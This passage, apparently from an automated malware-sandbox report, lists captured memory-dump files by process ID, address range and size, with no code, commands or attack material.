                      • memory/996-340-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/996-337-0x0000000000000000-mapping.dmp
                      • memory/996-335-0x0000000000000000-mapping.dmp
                      • memory/996-342-0x00000000003F0000-0x00000000003F1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1004-0-0x0000000000000000-mapping.dmp
                      • memory/1148-50-0x0000000000000000-mapping.dmp
                      • memory/1152-388-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/1152-382-0x0000000000000000-mapping.dmp
                      • memory/1300-20-0x0000000000000000-mapping.dmp
                      • memory/1320-89-0x0000000008EA0000-0x0000000008EA1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1320-19-0x0000000000000000-mapping.dmp
                      • memory/1320-87-0x00000000096F0000-0x00000000096F1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1320-24-0x000000006FE40000-0x000000007052E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1320-33-0x0000000007080000-0x0000000007081000-memory.dmp
                        Filesize

                        4KB

                      • memory/1392-7-0x0000000000000000-mapping.dmp
                      • memory/1464-161-0x000000000041A684-mapping.dmp
                      • memory/1464-158-0x0000000000400000-0x0000000000425000-memory.dmp
                        Filesize

                        148KB

                      • memory/1464-165-0x0000000000400000-0x0000000000425000-memory.dmp
                        Filesize

                        148KB

                      • memory/1468-276-0x000000000041A684-mapping.dmp
                      • memory/1468-278-0x0000000000400000-0x0000000000420000-memory.dmp
                        Filesize

                        128KB

                      • memory/1468-275-0x0000000000400000-0x0000000000420000-memory.dmp
                        Filesize

                        128KB

                      • memory/1592-259-0x0000000000000000-mapping.dmp
                      • memory/1672-2-0x0000000000000000-mapping.dmp
                      • memory/1672-3-0x0000000000000000-mapping.dmp
                      • memory/1912-151-0x0000000000000000-mapping.dmp
                      • memory/2036-149-0x0000000000000000-mapping.dmp
                      • memory/2124-9-0x0000000000000000-mapping.dmp
                      • memory/2136-401-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/2136-392-0x0000000000000000-mapping.dmp
                      • memory/2292-29-0x0000000007C50000-0x0000000007C51000-memory.dmp
                        Filesize

                        4KB

                      • memory/2292-16-0x0000000000000000-mapping.dmp
                      • memory/2292-22-0x000000006FE40000-0x000000007052E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2424-329-0x0000000000000000-mapping.dmp
                      • memory/2460-230-0x0000000000000000-mapping.dmp
                      • memory/2464-10-0x0000000000000000-mapping.dmp
                      • memory/2524-299-0x0000000000D10000-0x0000000000D11000-memory.dmp
                        Filesize

                        4KB

                      • memory/2524-308-0x000000000AD90000-0x000000000ADA2000-memory.dmp
                        Filesize

                        72KB

                      • memory/2524-303-0x00000000055A0000-0x00000000055A1000-memory.dmp
                        Filesize

                        4KB

                      • memory/2524-314-0x000000000B220000-0x000000000B225000-memory.dmp
                        Filesize

                        20KB

                      • memory/2524-293-0x0000000070750000-0x0000000070E3E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2524-290-0x0000000000000000-mapping.dmp
                      • memory/2536-321-0x0000000005000000-0x0000000005001000-memory.dmp
                        Filesize

                        4KB

                      • memory/2536-315-0x0000000000000000-mapping.dmp
                      • memory/2536-317-0x0000000004E30000-0x0000000004E31000-memory.dmp
                        Filesize

                        4KB

                      • memory/2592-208-0x0000000000000000-mapping.dmp
                      • memory/2664-386-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/2664-379-0x0000000000000000-mapping.dmp
                      • memory/2696-238-0x0000000000000000-mapping.dmp
                      • memory/2708-232-0x0000000000000000-mapping.dmp
                      • memory/2712-233-0x0000000000000000-mapping.dmp
                      • memory/2808-214-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/2808-211-0x0000000000400000-0x0000000000493000-memory.dmp
                        Filesize

                        588KB

                      • memory/2808-212-0x000000000043FCC3-mapping.dmp
                      • memory/2864-402-0x0000000000000000-mapping.dmp
                      • memory/2864-411-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/3012-228-0x0000000000000000-mapping.dmp
                      • memory/3076-156-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/3076-153-0x000000000043FCC3-mapping.dmp
                      • memory/3076-150-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/3244-345-0x0000000000000000-mapping.dmp
                      • memory/3276-18-0x0000000000000000-mapping.dmp
                      • memory/3276-23-0x000000006FE40000-0x000000007052E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3276-37-0x0000000008180000-0x0000000008181000-memory.dmp
                        Filesize

                        4KB

                      • memory/3276-41-0x0000000008010000-0x0000000008011000-memory.dmp
                        Filesize

                        4KB

                      • memory/3276-45-0x0000000008300000-0x0000000008301000-memory.dmp
                        Filesize

                        4KB

                      • memory/3276-54-0x00000000081F0000-0x00000000081F1000-memory.dmp
                        Filesize

                        4KB

                      • memory/3516-298-0x0000000070750000-0x0000000070E3E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/3516-309-0x0000000002670000-0x0000000002681000-memory.dmp
                        Filesize

                        68KB

                      • memory/3516-301-0x00000000003F0000-0x00000000003F1000-memory.dmp
                        Filesize

                        4KB

                      • memory/3516-324-0x0000000005390000-0x0000000005393000-memory.dmp
                        Filesize

                        12KB

                      • memory/3516-305-0x0000000000B00000-0x0000000000B01000-memory.dmp
                        Filesize

                        4KB

                      • memory/3516-294-0x0000000000000000-mapping.dmp
                      • memory/3668-13-0x0000000000000000-mapping.dmp
                      • memory/4020-279-0x0000000000000000-mapping.dmp
                      • memory/4020-363-0x0000000004E90000-0x0000000004EB4000-memory.dmp
                        Filesize

                        144KB

                      • memory/4020-283-0x00000000003C0000-0x00000000003C1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4020-360-0x0000000004E60000-0x0000000004E83000-memory.dmp
                        Filesize

                        140KB

                      • memory/4020-289-0x0000000004D80000-0x0000000004D81000-memory.dmp
                        Filesize

                        4KB

                      • memory/4020-433-0x0000000007140000-0x0000000007141000-memory.dmp
                        Filesize

                        4KB

                      • memory/4020-282-0x0000000070750000-0x0000000070E3E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4100-141-0x0000000000000000-mapping.dmp
                      • memory/4104-52-0x0000000000000000-mapping.dmp
                      • memory/4120-398-0x0000000000000000-mapping.dmp
                      • memory/4120-408-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/4168-364-0x0000000070750000-0x0000000070E3E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4168-362-0x0000000000000000-mapping.dmp
                      • memory/4220-53-0x0000000000000000-mapping.dmp
                      • memory/4220-63-0x000000006FE40000-0x000000007052E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4236-267-0x0000000000000000-mapping.dmp
                      • memory/4240-384-0x0000000000000000-mapping.dmp
                      • memory/4240-391-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/4264-64-0x000000006FE40000-0x000000007052E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4264-57-0x0000000000000000-mapping.dmp
                      • memory/4304-383-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/4304-375-0x0000000000000000-mapping.dmp
                      • memory/4312-352-0x00000000097C0000-0x00000000097F3000-memory.dmp
                        Filesize

                        204KB

                      • memory/4312-325-0x0000000000000000-mapping.dmp
                      • memory/4312-404-0x0000000009400000-0x0000000009401000-memory.dmp
                        Filesize

                        4KB

                      • memory/4312-359-0x0000000009590000-0x0000000009591000-memory.dmp
                        Filesize

                        4KB

                      • memory/4312-343-0x00000000084E0000-0x00000000084E1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4312-361-0x0000000009900000-0x0000000009901000-memory.dmp
                        Filesize

                        4KB

                      • memory/4312-407-0x0000000008A20000-0x0000000008A21000-memory.dmp
                        Filesize

                        4KB

                      • memory/4312-334-0x00000000080D0000-0x00000000080D1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4312-327-0x0000000070750000-0x0000000070E3E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4348-244-0x0000000000400000-0x0000000000434000-memory.dmp
                        Filesize

                        208KB

                      • memory/4348-242-0x0000000000417A8B-mapping.dmp
                      • memory/4348-241-0x0000000000400000-0x0000000000434000-memory.dmp
                        Filesize

                        208KB

                      • memory/4348-260-0x0000000003F40000-0x0000000003F41000-memory.dmp
                        Filesize

                        4KB

                      • memory/4352-348-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/4352-350-0x000001A0BE680000-0x000001A0BE681000-memory.dmp
                        Filesize

                        4KB

                      • memory/4352-349-0x000001A0A41B0000-0x000001A0A41B1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4352-346-0x0000000000000000-mapping.dmp
                      • memory/4380-169-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/4380-163-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/4380-166-0x0000000000417A8B-mapping.dmp
                      • memory/4424-304-0x0000000000000000-mapping.dmp
                      • memory/4464-387-0x0000000000000000-mapping.dmp
                      • memory/4464-395-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/4484-397-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/4484-389-0x0000000000000000-mapping.dmp
                      • memory/4500-172-0x0000000000400000-0x0000000000498000-memory.dmp
                        Filesize

                        608KB

                      • memory/4500-170-0x000000000043FCC3-mapping.dmp
                      • memory/4644-176-0x000000000041A684-mapping.dmp
                      • memory/4648-178-0x0000000000400000-0x0000000000439000-memory.dmp
                        Filesize

                        228KB

                      • memory/4648-175-0x0000000000417A8B-mapping.dmp
                      • memory/4700-219-0x00000000006C0000-0x00000000006C1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4700-223-0x00000000027C0000-0x00000000027C1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4700-216-0x0000000000000000-mapping.dmp
                      • memory/4700-218-0x0000000071A00000-0x00000000720EE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4700-236-0x000000000AB70000-0x000000000ABC1000-memory.dmp
                        Filesize

                        324KB

                      • memory/4780-246-0x0000000000000000-mapping.dmp
                      • memory/4780-248-0x0000000071A00000-0x00000000720EE000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4780-249-0x0000000000A10000-0x0000000000A11000-memory.dmp
                        Filesize

                        4KB

                      • memory/4780-270-0x0000000005340000-0x0000000005364000-memory.dmp
                        Filesize

                        144KB

                      • memory/4780-251-0x0000000001250000-0x0000000001251000-memory.dmp
                        Filesize

                        4KB

                      • memory/4828-287-0x0000000000000000-mapping.dmp
                      • memory/4828-438-0x0000000003D70000-0x0000000003DBC000-memory.dmp
                        Filesize

                        304KB

                      • memory/4884-296-0x0000000000000000-mapping.dmp
                      • memory/4896-117-0x0000000000000000-mapping.dmp
                      • memory/4896-187-0x0000000005330000-0x00000000053E0000-memory.dmp
                        Filesize

                        704KB

                      • memory/4896-122-0x00000000005B0000-0x00000000005B1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4896-209-0x00000000054A0000-0x00000000054AD000-memory.dmp
                        Filesize

                        52KB

                      • memory/4896-190-0x00000000059F0000-0x00000000059F1000-memory.dmp
                        Filesize

                        4KB

                      • memory/4896-120-0x000000006FE40000-0x000000007052E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/4956-123-0x0000000000000000-mapping.dmp
                      • memory/5044-133-0x0000000000000000-mapping.dmp
                      • memory/5052-403-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/5052-396-0x0000000000000000-mapping.dmp
                      • memory/5072-378-0x00007FFDD0A80000-0x00007FFDD146C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/5072-373-0x0000000000000000-mapping.dmp
                      • memory/5104-138-0x0000000000000000-mapping.dmp
                      • memory/5436-476-0x0000000000000000-mapping.dmp
                      • memory/5436-480-0x0000000000000000-mapping.dmp
                      • memory/5436-482-0x0000000000000000-mapping.dmp
                      • memory/5436-484-0x0000000000000000-mapping.dmp
                      • memory/5436-486-0x0000000000000000-mapping.dmp
                      • memory/5436-488-0x0000000000000000-mapping.dmp
                      • memory/5436-490-0x0000000000000000-mapping.dmp
                      • memory/5436-492-0x0000000000000000-mapping.dmp
                      • memory/5436-494-0x0000000000000000-mapping.dmp
                      • memory/5436-496-0x0000000000000000-mapping.dmp
                      • memory/5436-498-0x0000000000000000-mapping.dmp
                      • memory/5436-500-0x0000000000000000-mapping.dmp
                      • memory/5436-502-0x0000000000000000-mapping.dmp
                      • memory/5436-504-0x0000000000000000-mapping.dmp
                      • memory/5436-506-0x0000000000000000-mapping.dmp
                      • memory/5436-508-0x0000000000000000-mapping.dmp
                      • memory/5436-510-0x0000000000000000-mapping.dmp
                      • memory/5436-512-0x0000000000000000-mapping.dmp
                      • memory/5436-478-0x0000000000000000-mapping.dmp
                      • memory/5436-515-0x0000000000000000-mapping.dmp
                      • memory/5436-517-0x0000000000000000-mapping.dmp
                      • memory/5436-519-0x0000000000000000-mapping.dmp
                      • memory/5436-521-0x0000000000000000-mapping.dmp
                      • memory/5436-523-0x0000000000000000-mapping.dmp
                      • memory/5436-525-0x0000000000000000-mapping.dmp
                      • memory/5436-527-0x0000000000000000-mapping.dmp
                      • memory/5436-529-0x0000000000000000-mapping.dmp
                      • memory/5436-531-0x0000000000000000-mapping.dmp
                      • memory/5436-533-0x0000000000000000-mapping.dmp
                      • memory/5436-535-0x0000000000000000-mapping.dmp
                      • memory/5436-537-0x0000000000000000-mapping.dmp
                      • memory/5436-539-0x0000000000000000-mapping.dmp
                      • memory/5436-541-0x0000000000000000-mapping.dmp
                      • memory/5436-543-0x0000000000000000-mapping.dmp
                      • memory/5436-545-0x0000000000000000-mapping.dmp
                      • memory/5436-474-0x0000000000000000-mapping.dmp
                      • memory/5436-548-0x0000000000000000-mapping.dmp
                      • memory/5436-472-0x0000000000000000-mapping.dmp
                      • memory/5436-551-0x0000000000000000-mapping.dmp
                      • memory/5436-553-0x0000000000000000-mapping.dmp
                      • memory/5436-555-0x0000000000000000-mapping.dmp
                      • memory/5436-470-0x0000000000000000-mapping.dmp
                      • memory/5436-558-0x0000000000000000-mapping.dmp
                      • memory/5436-468-0x0000000000000000-mapping.dmp
                      • memory/5436-561-0x0000000000000000-mapping.dmp
                      • memory/5436-466-0x0000000000000000-mapping.dmp
                      • memory/5436-464-0x0000000000000000-mapping.dmp
                      • memory/5436-462-0x0000000000000000-mapping.dmp
                      • memory/5436-460-0x0000000000000000-mapping.dmp
                      • memory/5436-458-0x0000000000000000-mapping.dmp
                      • memory/5436-456-0x0000000000000000-mapping.dmp
                      • memory/5436-454-0x0000000000000000-mapping.dmp
                      • memory/5436-452-0x0000000000000000-mapping.dmp
                      • memory/5436-450-0x0000000000000000-mapping.dmp
                      • memory/5436-448-0x0000000003240000-0x0000000003241000-memory.dmp
                        Filesize

                        4KB

                      • memory/5436-447-0x0000000000000000-mapping.dmp
                      • memory/5436-446-0x0000000002F80000-0x0000000002F81000-memory.dmp
                        Filesize

                        4KB